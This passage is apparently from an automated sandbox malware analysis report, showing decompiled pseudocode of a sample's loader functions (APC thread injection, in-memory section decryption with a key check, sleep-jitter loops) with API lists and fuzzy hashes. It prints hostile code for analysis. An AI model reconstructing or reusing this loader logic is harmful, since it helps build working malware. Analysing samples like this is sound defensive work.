                                                          								}
                                                          								break;
                                                          							}
                                                          							CloseHandle( *0x1000410c);
                                                          						}
                                                          						HeapDestroy( *0x10004110);
                                                          					}
                                                          				} else {
                                                          					if(_t9 == 1 && InterlockedIncrement(0x10004108) == 1) {
                                                          						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                          						 *0x10004110 = _t18;
                                                          						_t41 = _t18;
                                                          						if(_t18 == 0) {
                                                          							L6:
                                                          							_v8 = 0;
                                                          						} else {
                                                          							 *0x10004130 = _a4;
                                                          							asm("lock xadd [eax], edi");
                                                          							_push( &_a8);
                                                          							_t23 = E1000155C(E100015EA, E10001A86(_a12, 1, 0x10004118, _t41));
                                                          							 *0x1000410c = _t23;
                                                          							if(_t23 == 0) {
                                                          								asm("lock xadd [esi], eax");
                                                          								goto L6;
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v8;
                                                          			}












                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(10004108), ref: 10001D6D
                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 10001D82
                                                            • Part of subcall function 1000155C: CreateThread.KERNEL32 ref: 10001573
                                                            • Part of subcall function 1000155C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001588
                                                            • Part of subcall function 1000155C: GetLastError.KERNEL32(00000000), ref: 10001593
                                                            • Part of subcall function 1000155C: TerminateThread.KERNEL32(00000000,00000000), ref: 1000159D
                                                            • Part of subcall function 1000155C: CloseHandle.KERNEL32(00000000), ref: 100015A4
                                                            • Part of subcall function 1000155C: SetLastError.KERNEL32(00000000), ref: 100015AD
                                                          • InterlockedDecrement.KERNEL32(10004108), ref: 10001DD5
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 10001DEF
                                                          • CloseHandle.KERNEL32 ref: 10001E0B
                                                          • HeapDestroy.KERNEL32 ref: 10001E17
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp
                                                          Similarity
                                                          • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                          • String ID:
                                                          • API String ID: 2110400756-0
                                                          • Opcode ID: 40578092a05b622e8806beb96ef45d375467769f53722385fffed7eee2b4cb66
                                                          • Instruction ID: 8abdcd5857cf8f821d83f0baa7898db106f37a39b4e53263aae9e46ce88ae204
                                                          • Opcode Fuzzy Hash: 40578092a05b622e8806beb96ef45d375467769f53722385fffed7eee2b4cb66
                                                          • Instruction Fuzzy Hash: 63215EB1601265AFF701EFA9CCC89CE7BE8FB552E17128529FA05D3168DB748D808F94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E005E12E5(void* __ecx, signed int __edx, intOrPtr _a4) {
                                                          				struct _FILETIME _v12;
                                                          				void* _t10;
                                                          				void* _t12;
                                                          				int _t14;
                                                          				signed int _t16;
                                                          				void* _t18;
                                                          				signed int _t19;
                                                          				unsigned int _t23;
                                                          				signed int _t26;
                                                          				signed int _t33;
                                                          
                                                          				_t26 = __edx;
                                                          				_push(__ecx);
                                                          				_push(__ecx);
                                                          				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                          				 *0x5ed238 = _t10;
                                                          				if(_t10 != 0) {
                                                          					 *0x5ed1a8 = GetTickCount();
                                                          					_t12 = E005E3E69(_a4);
                                                          					if(_t12 == 0) {
                                                          						do {
                                                          							GetSystemTimeAsFileTime( &_v12);
                                                          							_t14 = SwitchToThread();
                                                          							_t23 = _v12.dwHighDateTime;
                                                          							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                                          							_push(0);
                                                          							_push(9);
                                                          							_push(_t23 >> 7);
                                                          							_push(_t16);
                                                          							L005EB08A();
                                                          							_t33 = _t14 + _t16;
                                                          							_t18 = E005E5548(_a4, _t33);
                                                          							_t19 = 2;
                                                          							_t25 = _t33;
                                                          							Sleep(_t19 << _t33); // executed
                                                          						} while (_t18 == 1);
                                                          						if(E005E4DA2(_t25) != 0) {
                                                          							 *0x5ed260 = 1; // executed
                                                          						}
                                                          						_t12 = E005E5BA2(_t26); // executed
                                                          					}
                                                          				} else {
                                                          					_t12 = 8;
                                                          				}
                                                          				return _t12;
                                                          			}













                                                          APIs
                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,005E4EF2,?), ref: 005E12F8
                                                          • GetTickCount.KERNEL32 ref: 005E130C
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,005E4EF2,?), ref: 005E1328
                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,005E4EF2,?), ref: 005E132E
                                                          • _aullrem.NTDLL(?,?,00000009,00000000), ref: 005E134B
                                                          • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,005E4EF2,?), ref: 005E1365
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                          • String ID:
                                                          • API String ID: 507476733-0
                                                          • Opcode ID: d8fd2a8572f0e610303174e7285a892cb597097761c5fc465a139c4ba4abd27f
                                                          • Instruction ID: 2e5cc122d353c02aabc26e9745cf8a77f30ae4bede3cedce91d32c28cc19227b
                                                          • Opcode Fuzzy Hash: d8fd2a8572f0e610303174e7285a892cb597097761c5fc465a139c4ba4abd27f
                                                          • Instruction Fuzzy Hash: 7F114C71A00341EFE31C6B76DC4EB1E7FA8BB98350F000515F9C5CE2D1EA70D8009664
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E1000155C(long _a4, DWORD* _a12) {
                                                          				_Unknown_base(*)()* _v0;
                                                          				void* _t4;
                                                          				long _t6;
                                                          				long _t11;
                                                          				void* _t13;
                                                          
                                                          				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x10004140, 0, _a12); // executed
                                                          				_t13 = _t4;
                                                          				if(_t13 != 0) {
                                                          					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                          					if(_t6 == 0) {
                                                          						_t11 = GetLastError();
                                                          						TerminateThread(_t13, _t11);
                                                          						CloseHandle(_t13);
                                                          						_t13 = 0;
                                                          						SetLastError(_t11);
                                                          					}
                                                          				}
                                                          				return _t13;
                                                          			}

                                                          APIs
                                                          • CreateThread.KERNEL32 ref: 10001573
                                                          • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001588
                                                          • GetLastError.KERNEL32(00000000), ref: 10001593
                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 1000159D
                                                          • CloseHandle.KERNEL32(00000000), ref: 100015A4
                                                          • SetLastError.KERNEL32(00000000), ref: 100015AD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp
                                                          Similarity
                                                          • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                          • String ID:
                                                          • API String ID: 3832013932-0
                                                          • Opcode ID: 6f0211ee254cd8ac356c66c047a1bb7dd8caa7d1716406ebd0edc35e6fc89079
                                                          • Instruction ID: be479b49fbd3a67d9e649fe4ff68f805dcd113b126df67a65f96eea9d80bca7e
                                                          • Opcode Fuzzy Hash: 6f0211ee254cd8ac356c66c047a1bb7dd8caa7d1716406ebd0edc35e6fc89079
                                                          • Instruction Fuzzy Hash: 6CF0FE72506631FBF3235BA19C98F9BBB6DFB487D1F018404FA0695168C72189119BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 22%
                                                          			E005E62DA(signed int __eax, signed int _a4, signed int _a8) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				intOrPtr _v16;
                                                          				signed int _v20;
                                                          				intOrPtr _t81;
                                                          				char _t83;
                                                          				signed int _t90;
                                                          				signed int _t97;
                                                          				signed int _t99;
                                                          				char _t101;
                                                          				unsigned int _t102;
                                                          				intOrPtr _t103;
                                                          				char* _t107;
                                                          				signed int _t110;
                                                          				signed int _t113;
                                                          				signed int _t118;
                                                          				signed int _t122;
                                                          				intOrPtr _t124;
                                                          
                                                          				_t102 = _a8;
                                                          				_t118 = 0;
                                                          				_v20 = __eax;
                                                          				_t122 = (_t102 >> 2) + 1;
                                                          				_v8 = 0;
                                                          				_a8 = 0;
                                                          				_t81 = E005EA71F(_t122 << 2);
                                                          				_v16 = _t81;
                                                          				if(_t81 == 0) {
                                                          					_push(8);
                                                          					_pop(0);
                                                          					L37:
                                                          					return 0;
                                                          				}
                                                          				_t107 = _a4;
                                                          				_a4 = _t102;
                                                          				_t113 = 0;
                                                          				while(1) {
                                                          					_t83 =  *_t107;
                                                          					if(_t83 == 0) {
                                                          						break;
                                                          					}
                                                          					if(_t83 == 0xd || _t83 == 0xa) {
                                                          						if(_t118 != 0) {
                                                          							if(_t118 > _v8) {
                                                          								_v8 = _t118;
                                                          							}
                                                          							_a8 = _a8 + 1;
                                                          							_t118 = 0;
                                                          						}
                                                          						 *_t107 = 0;
                                                          						goto L16;
                                                          					} else {
                                                          						if(_t118 != 0) {
                                                          							L10:
                                                          							_t118 = _t118 + 1;
                                                          							L16:
                                                          							_t107 = _t107 + 1;
                                                          							_t15 =  &_a4;
                                                          							 *_t15 = _a4 - 1;
                                                          							if( *_t15 != 0) {
                                                          								continue;
                                                          							}
                                                          							break;
                                                          						}
                                                          						if(_t113 == _t122) {
                                                          							L21:
                                                          							if(_a8 <= 0x20) {
                                                          								_push(0xb);
                                                          								L34:
                                                          								_pop(0);
                                                          								L35:
                                                          								E005EA734(_v16);
                                                          								goto L37;
                                                          							}
                                                          							_t24 = _v8 + 5; // 0xcdd8d2f8
                                                          							_t103 = E005EA71F((_v8 + _t24) * _a8 + 4);
                                                          							if(_t103 == 0) {
                                                          								_push(8);
                                                          								goto L34;
                                                          							}
                                                          							_t90 = _a8;
                                                          							_a4 = _a4 & 0x00000000;
                                                          							_v8 = _v8 & 0x00000000;
                                                          							_t124 = _t103 + _t90 * 4;
                                                          							if(_t90 <= 0) {
                                                          								L31:
                                                          								 *0x5ed278 = _t103;
                                                          								goto L35;
                                                          							}
                                                          							do {
                                                          								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                          								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                                          								_v12 = _v12 & 0x00000000;
                                                          								if(_a4 <= 0) {
                                                          									goto L30;
                                                          								} else {
                                                          									goto L26;
                                                          								}
                                                          								while(1) {
                                                          									L26:
                                                          									_t99 = _v12;
                                                          									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                                          									if(_t99 == 0) {
                                                          										break;
                                                          									}
                                                          									_v12 = _v12 + 1;
                                                          									if(_v12 < _a4) {
                                                          										continue;
                                                          									}
                                                          									goto L30;
                                                          								}
                                                          								_v8 = _v8 - 1;
                                                          								L30:
                                                          								_t97 = _a4;
                                                          								_a4 = _a4 + 1;
                                                          								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                                          								__imp__(_t124);
                                                          								_v8 = _v8 + 1;
                                                          								_t124 = _t124 + _t97 + 1;
                                                          							} while (_v8 < _a8);
                                                          							goto L31;
                                                          						}
                                                          						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                                          						_t101 = _t83;
                                                          						if(_t83 - 0x61 <= 0x19) {
                                                          							_t101 = _t101 - 0x20;
                                                          						}
                                                          						 *_t107 = _t101;
                                                          						_t113 = _t113 + 1;
                                                          						goto L10;
                                                          					}
                                                          				}
                                                          				if(_t118 != 0) {
                                                          					if(_t118 > _v8) {
                                                          						_v8 = _t118;
                                                          					}
                                                          					_a8 = _a8 + 1;
                                                          				}
                                                          				goto L21;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • lstrcpy.KERNEL32(63699BC4,00000020), ref: 005E63D7
                                                          • lstrcat.KERNEL32(63699BC4,00000020), ref: 005E63EC
                                                          • lstrcmp.KERNEL32(00000000,63699BC4), ref: 005E6403
                                                          • lstrlen.KERNEL32(63699BC4), ref: 005E6427
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          • Opcode ID: b5d1fb274c91817779498d21bf39365ea7c15aef49bc4dc567c8118fff54ed66
                                                          • Instruction ID: ee10f7cbae33f17b6bef647791dbc3a7d24a0ea1340c0397ad23b2911256d861
                                                          • Opcode Fuzzy Hash: b5d1fb274c91817779498d21bf39365ea7c15aef49bc4dc567c8118fff54ed66
                                                          • Instruction Fuzzy Hash: 9B51E171A00258EFCF29DF9AC4846ADBFB6FF653D0F14845AE8959B241C770EA41CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 90%
                                                          			E10001717(void* __edi, intOrPtr _a4) {
                                                          				intOrPtr _v8;
                                                          				char _v12;
                                                          				void* _v16;
                                                          				unsigned int _v20;
                                                          				intOrPtr _v24;
                                                          				char _v28;
                                                          				signed int _v32;
                                                          				void* _v36;
                                                          				signed int _v40;
                                                          				signed char _v44;
                                                          				void* _v48;
                                                          				signed int _v56;
                                                          				signed int _v60;
                                                          				intOrPtr _t50;
                                                          				void* _t57;
                                                          				void* _t61;
                                                          				signed int _t67;
                                                          				signed char _t69;
                                                          				signed char _t70;
                                                          				void* _t76;
                                                          				intOrPtr _t77;
                                                          				unsigned int _t82;
                                                          				intOrPtr _t86;
                                                          				intOrPtr* _t89;
                                                          				intOrPtr _t90;
                                                          				void* _t91;
                                                          				signed int _t93;
                                                          
                                                          				_t90 =  *0x10004130;
                                                          				_t50 = E1000193C(_t90,  &_v28,  &_v20);
                                                          				_v24 = _t50;
                                                          				if(_t50 == 0) {
                                                          					asm("sbb ebx, ebx");
                                                          					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
                                                          					_t91 = _t90 + _v28;
                                                          					_v48 = _t91;
                                                          					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
                                                          					_t76 = _t57;
                                                          					_v36 = _t76;
                                                          					if(_t76 == 0) {
                                                          						_v24 = 8;
                                                          					} else {
                                                          						_t69 = 0;
                                                          						if(_t67 <= 0) {
                                                          							_t77 =  *0x10004140;
                                                          						} else {
                                                          							_t86 = _a4;
                                                          							_v8 = _t91;
                                                          							_v8 = _v8 - _t76;
                                                          							_t14 = _t86 + 0x100051a7; // 0x3220a9c2
                                                          							_t61 = _t57 - _t91 + _t14;
                                                          							_v16 = _t76;
                                                          							do {
                                                          								asm("movsd");
                                                          								asm("movsd");
                                                          								asm("movsd");
                                                          								_t70 = _t69 + 1;
                                                          								_v44 = _t70;
                                                          								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
                                                          								if(_t82 != 0) {
                                                          									_v32 = _v32 & 0x00000000;
                                                          									_t89 = _v16;
                                                          									_v12 = 0x400;
                                                          									do {
                                                          										_t93 =  *((intOrPtr*)(_v8 + _t89));
                                                          										_v40 = _t93;
                                                          										if(_t93 == 0) {
                                                          											_v12 = 1;
                                                          										} else {
                                                          											 *_t89 = _t93 + _v32 - _t82;
                                                          											_v32 = _v40;
                                                          											_t89 = _t89 + 4;
                                                          										}
                                                          										_t33 =  &_v12;
                                                          										 *_t33 = _v12 - 1;
                                                          									} while ( *_t33 != 0);
                                                          								}
                                                          								_t69 = _v44;
                                                          								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
                                                          								_v16 = _v16 + 0x1000;
                                                          								 *0x10004140 = _t77;
                                                          							} while (_t69 < _t67);
                                                          						}
                                                          						if(_t77 != 0x63699bc3) {
                                                          							_v24 = 0xc;
                                                          						} else {
                                                          							memcpy(_v48, _v36, _v20);
                                                          						}
                                                          						VirtualFree(_v36, 0, 0x8000); // executed
                                                          					}
                                                          				}
                                                          				return _v24;
                                                          			}

                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 1000176D
                                                          • memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 10001833
                                                          • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 1000184E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp
                                                          Similarity
                                                          • API ID: Virtual$AllocFreememcpy
                                                          • String ID: Jun 9 2021
                                                          • API String ID: 4010158826-3443083063
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E005E6545(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                          				intOrPtr _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				intOrPtr _t26;
                                                          				intOrPtr* _t28;
                                                          				intOrPtr _t31;
                                                          				intOrPtr* _t32;
                                                          				void* _t39;
                                                          				int _t46;
                                                          				intOrPtr* _t47;
                                                          				int _t48;
                                                          
                                                          				_t47 = __eax;
                                                          				_push( &_v12);
                                                          				_push(__eax);
                                                          				_t39 = 0;
                                                          				_t46 = 0; // executed
                                                          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                          				_v8 = _t26;
                                                          				if(_t26 < 0) {
                                                          					L13:
                                                          					return _v8;
                                                          				}
                                                          				if(_v12 == 0) {
                                                          					Sleep(0xc8);
                                                          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                          				}
                                                          				if(_v8 >= _t39) {
                                                          					_t28 = _v12;
                                                          					if(_t28 != 0) {
                                                          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                          						_v8 = _t31;
                                                          						if(_t31 >= 0) {
                                                          							_t46 = lstrlenW(_v16);
                                                          							if(_t46 != 0) {
                                                          								_t46 = _t46 + 1;
                                                          								_t48 = _t46 + _t46;
                                                          								_t39 = E005EA71F(_t48);
                                                          								if(_t39 == 0) {
                                                          									_v8 = 0x8007000e;
                                                          								} else {
                                                          									memcpy(_t39, _v16, _t48);
                                                          								}
                                                          								__imp__#6(_v16);
                                                          							}
                                                          						}
                                                          						_t32 = _v12;
                                                          						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                          					}
                                                          					 *_a4 = _t39;
                                                          					 *_a8 = _t46 + _t46;
                                                          				}
                                                          				goto L13;
                                                          			}

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1198164300-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E100015EA(void* __ecx, char _a4) {
                                                          				long _t3;
                                                          				int _t4;
                                                          				int _t9;
                                                          				void* _t13;
                                                          
                                                          				_t13 = GetCurrentThread();
                                                          				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                          				if(_t3 != 0) {
                                                          					SetThreadPriority(_t13, 0xffffffff); // executed
                                                          				}
                                                          				_t4 = E10001456(_a4); // executed
                                                          				_t9 = _t4;
                                                          				if(_t9 == 0) {
                                                          					SetThreadPriority(_t13, _t4);
                                                          				}
                                                          				asm("lock xadd [eax], ecx");
                                                          				return _t9;
                                                          			}

                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 100015ED
                                                          • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 100015F8
                                                          • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 1000160B
                                                          • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 1000161E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp
                                                          Similarity
                                                          • API ID: Thread$Priority$AffinityCurrentMask
                                                          • String ID:
                                                          • API String ID: 1452675757-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E005E8D14(void* __edx) {
                                                          				void* _v8;
                                                          				int _v12;
                                                          				WCHAR* _v16;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t23;
                                                          				intOrPtr _t24;
                                                          				intOrPtr _t32;
                                                          				intOrPtr _t35;
                                                          				intOrPtr _t38;
                                                          				intOrPtr _t42;
                                                          				void* _t45;
                                                          				void* _t50;
                                                          				void* _t52;
                                                          
                                                          				_t50 = __edx;
                                                          				_v12 = 0;
                                                          				_t23 = E005EA2F9(0,  &_v8); // executed
                                                          				if(_t23 != 0) {
                                                          					_v8 = 0;
                                                          				}
                                                          				_t24 =  *0x5ed2a8; // 0x107a5a8
                                                          				_t4 = _t24 + 0x5eedc0; // 0x1669368
                                                          				_t5 = _t24 + 0x5eed68; // 0x4f0053
                                                          				_t45 = E005E5356( &_v16, _v8, _t5, _t4);
                                                          				if(_t45 == 0) {
                                                          					StrToIntExW(_v16, 0,  &_v12);
                                                          					_t45 = 8;
                                                          					if(_v12 < _t45) {
                                                          						_t45 = 1;
                                                          						__eflags = 1;
                                                          					} else {
                                                          						_t32 =  *0x5ed2a8; // 0x107a5a8
                                                          						_t11 = _t32 + 0x5eedb4; // 0x166935c
                                                          						_t48 = _t11;
                                                          						_t12 = _t32 + 0x5eed68; // 0x4f0053
                                                          						_t52 = E005E45C6(_t11, _t12, _t11);
                                                          						_t59 = _t52;
                                                          						if(_t52 != 0) {
                                                          							_t35 =  *0x5ed2a8; // 0x107a5a8
                                                          							_t13 = _t35 + 0x5eedfe; // 0x30314549
                                                          							if(E005E8E27(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                                                          								_t61 =  *0x5ed25c - 6;
                                                          								if( *0x5ed25c <= 6) {
                                                          									_t42 =  *0x5ed2a8; // 0x107a5a8
                                                          									_t15 = _t42 + 0x5eec0a; // 0x52384549
                                                          									E005E8E27(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                                          								}
                                                          							}
                                                          							_t38 =  *0x5ed2a8; // 0x107a5a8
                                                          							_t17 = _t38 + 0x5eedf8; // 0x16693a0
                                                          							_t18 = _t38 + 0x5eedd0; // 0x680043
                                                          							_t45 = E005E5D7D(_v8, 0x80000001, _t52, _t18, _t17);
                                                          							HeapFree( *0x5ed238, 0, _t52);
                                                          						}
                                                          					}
                                                          					HeapFree( *0x5ed238, 0, _v16);
                                                          				}
                                                          				_t54 = _v8;
                                                          				if(_v8 != 0) {
                                                          					E005E4F14(_t54);
                                                          				}
                                                          				return _t45;
                                                          			}

                                                          APIs
                                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,01669368,00000000,?,74B5F710,00000000,74B5F730), ref: 005E8D63
                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,016693A0,?,00000000,30314549,00000014,004F0053,0166935C), ref: 005E8E00
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,005E523E), ref: 005E8E12
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 8f1cfabedcddc48c9b8e0112939626504b07efdfd60409739956d2504d12ad55
                                                          • Instruction ID: b86d81f51b9f98cefd9896543cac5ccb424fa90befe721d3449103a12bfce3c8
                                                          • Opcode Fuzzy Hash: 8f1cfabedcddc48c9b8e0112939626504b07efdfd60409739956d2504d12ad55
                                                          • Instruction Fuzzy Hash: 15310F759001C9BFDB19EB92CEC9EAA7FBDFB54700F000099B684AB060D7309E08DB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E005EA376(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                          				void* _v8;
                                                          				void* __edi;
                                                          				intOrPtr _t18;
                                                          				void* _t24;
                                                          				void* _t30;
                                                          				void* _t36;
                                                          				void* _t40;
                                                          				intOrPtr _t42;
                                                          
                                                          				_t36 = __edx;
                                                          				_t32 = __ecx;
                                                          				_push(__ecx);
                                                          				_push(__ecx);
                                                          				_t42 =  *0x5ed340; // 0x1669a88
                                                          				_push(0x800);
                                                          				_push(0);
                                                          				_push( *0x5ed238);
                                                          				if( *0x5ed24c >= 5) {
                                                          					if(RtlAllocateHeap() == 0) {
                                                          						L6:
                                                          						_t30 = 8;
                                                          						L7:
                                                          						if(_t30 != 0) {
                                                          							L10:
                                                          							 *0x5ed24c =  *0x5ed24c + 1;
                                                          							L11:
                                                          							return _t30;
                                                          						}
                                                          						_t44 = _a4;
                                                          						_t40 = _v8;
                                                          						 *_a16 = _a4;
                                                          						 *_a20 = E005E7306(_t44, _t40);
                                                          						_t18 = E005E4A09(_t40, _t44);
                                                          						if(_t18 != 0) {
                                                          							 *_a8 = _t40;
                                                          							 *_a12 = _t18;
                                                          							if( *0x5ed24c < 5) {
                                                          								 *0x5ed24c =  *0x5ed24c & 0x00000000;
                                                          							}
                                                          							goto L11;
                                                          						}
                                                          						_t30 = 0xbf;
                                                          						E005E6761();
                                                          						RtlFreeHeap( *0x5ed238, 0, _t40); // executed
                                                          						goto L10;
                                                          					}
                                                          					_t24 = E005E1F13(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
                                                          					L5:
                                                          					_t30 = _t24;
                                                          					goto L7;
                                                          				}
                                                          				if(RtlAllocateHeap() == 0) {
                                                          					goto L6;
                                                          				}
                                                          				_t24 = E005E4AB6(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
                                                          				goto L5;
                                                          			}












                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 005EA39A
                                                            • Part of subcall function 005E4AB6: GetTickCount.KERNEL32 ref: 005E4ACA
                                                            • Part of subcall function 005E4AB6: wsprintfA.USER32 ref: 005E4B1A
                                                            • Part of subcall function 005E4AB6: wsprintfA.USER32 ref: 005E4B37
                                                            • Part of subcall function 005E4AB6: wsprintfA.USER32 ref: 005E4B63
                                                            • Part of subcall function 005E4AB6: HeapFree.KERNEL32(00000000,?), ref: 005E4B75
                                                            • Part of subcall function 005E4AB6: wsprintfA.USER32 ref: 005E4B96
                                                            • Part of subcall function 005E4AB6: HeapFree.KERNEL32(00000000,?), ref: 005E4BA6
                                                            • Part of subcall function 005E4AB6: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 005E4BD4
                                                            • Part of subcall function 005E4AB6: GetTickCount.KERNEL32 ref: 005E4BE5
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 005EA3B8
                                                          • RtlFreeHeap.NTDLL(00000000,00000002,005E5289,?,005E5289,00000002,?,?,^]^,?), ref: 005EA415
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp
